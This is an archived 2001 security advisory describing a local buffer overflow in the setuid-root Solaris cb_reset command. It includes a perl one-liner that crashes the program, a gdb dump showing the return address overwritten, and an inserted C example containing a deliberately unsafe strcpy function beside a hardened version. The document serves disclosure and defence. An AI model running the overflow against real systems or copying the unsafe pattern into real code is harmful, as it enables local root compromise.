Solaris /opt/SUNWssp/bin/cb_reset Vulnerability

From: Pablo Sor (psorat_private)
Date: Wed Jun 20 2001 - 09:30:59 PDT

    Vulnerability in Solaris /opt/SUNWssp/bin/cb_reset
    
    Date Published: June 12, 2001
    
    Advisory ID: N/A
    
    Bugtraq ID: N/A
    
    CVE CAN: None currently assigned.
    
    Title: Solaris /opt/SUNWssp/bin/cb_reset Buffer Overflow Vulnerability
    
    Class: Boundary Error Condition
    
    Remotely Exploitable: No
    
    Locally Exploitable: Yes
    
    Vulnerability Description:
    
    A problem with the cb_reset setuid root command included in the SUNWssp package 
    (not part of the standard install) results in a buffer overflow and potentially 
    the execution of arbitrary code.
    Due to insufficient handling of an input parameter, an argument of 600 
    characters overflows a stack buffer, making it possible to overwrite variables 
    on the stack, including the return address.
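    The following is an added illustration, not cb_reset's source (which this advisory does not include): the unbounded copy of a command-line hostname into a fixed stack buffer that produces this class of overflow, next to a bounded version that validates the argument before it reaches the buffer. The buffer size HOST_BUF and the function names are assumptions.

```c
/* Added illustration (not cb_reset's source, which is not in the advisory):
 * an unbounded copy of a command-line hostname into a fixed stack buffer,
 * next to a bounded version that validates the argument before copying.
 * HOST_BUF is an assumed size; the advisory only states that 600 bytes
 * are enough to overwrite the saved return address. */
#include <ctype.h>
#include <string.h>

#define HOST_BUF        64   /* assumed buffer size */
#define MAX_HOSTNAME   255   /* RFC 1035 limit on a full hostname */

/* Unsafe: strcpy() stops only at NUL, so an argument of HOST_BUF bytes or
 * more runs past host[] into the saved registers of this frame.  On SPARC
 * that is the i7/fp = 0x41414141 seen in the gdb dump further down. */
int resolve_unsafe(const char *dsthost)
{
    char host[HOST_BUF];
    strcpy(host, dsthost);
    return (int)strlen(host);
}

/* Hardened: reject empty, overlong, or non-hostname input before copying;
 * out must hold at least outlen bytes.  Returns 0 on success, -1 on reject. */
int resolve_safe(const char *dsthost, char *out, size_t outlen)
{
    size_t n = strlen(dsthost);
    if (n == 0 || n > MAX_HOSTNAME || n >= outlen)
        return -1;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)dsthost[i];
        if (!isalnum(c) && c != '-' && c != '.')
            return -1;
    }
    memcpy(out, dsthost, n + 1);   /* n + 1 <= outlen, NUL included */
    return 0;
}

/* Replays the advisory's 600-byte "A" argument against the checked path. */
int overlong_is_rejected(void)
{
    char arg[601], out[HOST_BUF];
    memset(arg, 'A', 600);
    arg[600] = '\0';
    return resolve_safe(arg, out, sizeof out) == -1;
}
```

    A setuid program should also fail closed on any rejected argument rather than fall through to the lookup, since the ether_hostton() error below is printed after the buffer has already been overrun.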
    
    Vulnerable Packages/Systems:
    
    SunOS 5.8 (not tested on other versions)
    
    Solution/Vendor Information/Workaround:
    
    Sun Microsystems was notified on June 12, 2001. Patches are expected shortly.
    
    Credits:
    
    This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.
    
    This advisory was drafted with the help of the SecurityFocus.com Vulnerability
    Help Team. For more information or assistance drafting advisories please mail
    vulnhelpat_private
    
    Technical Description :
    
    $ uname -a
    SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10
    
    $ ls /tftpboot/cb_port
    /tftpboot/cb_port
    
    $ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
    Resetting host
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
    ether_hostton(SrcHost:laika): No such file or directory
    ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAA): No such file or directory
    Bus Error (core dumped)
    
    $ gdb /opt/SUNWssp/bin/cb_reset --core=core
    Copyright 2000 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "sparc-sun-solaris2.8"...
    (no debugging symbols found)...
    Core was generated by `/opt/SUNWssp/bin/cb_reset
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 10, Bus Error.
    Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
    (no debugging symbols found)...done.
    Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
    Reading symbols from /opt/SUNWssp/lib/liblogger.so...
    (no debugging symbols found)...done.
    
    [...]
    
    Loaded symbols for /usr/lib/nss_files.so.1
    #0  0x1219c in cb_send_frame ()
    (gdb) info registers
    g0             0x0      0
    g1             0xff195b80       -15115392
    g2             0xff322630       -13490640
    g3             0xff332d78       -13423240
    g4             0x0      0
    g5             0x0      0
    g6             0x0      0
    g7             0x0      0
    o0             0x13278  78456
    o1             0xff1bbab8       -14959944
    o2             0xff1b8018       -14974952
    o3             0x13278  78456
    o4             0x13258  78424
    o5             0xffbedb71       -4269199
    sp             0xffbedb18       -4269288
    o7             0x1218c  74124
    l0             0xc3c3c3c3       -1010580541
    l1             0x41414141       1094795585
    l2             0x41414141       1094795585
    l3             0x41414141       1094795585
    l4             0x41414141       1094795585
    l5             0x41414141       1094795585
    l6             0x41414141       1094795585
    l7             0x41414141       1094795585
    i0             0x41414141       1094795585
    i1             0x41414141       1094795585
    i2             0x41414141       1094795585
    i3             0x41414141       1094795585
    i4             0x4141414d       1094795597
    i5             0x41414141       1094795585
    fp             0x41414141       1094795585
    i7             0x41414141       1094795585  (***)
    y              0xb      11
    psr            0xfe801001       -25161727
    wim            0x0      0
    tbr            0x0      0
    pc             0x1219c  74140
    npc            0x121a0  74144
    fpsr           0x0      0      
    cpsr           0x0      0
    (gdb) 
    
    
    -- 
    Pablo Sor
    psorat_private, psorat_private
    



    This archive was generated by hypermail 2b30 : Wed Jun 20 2001 - 15:59:08 PDT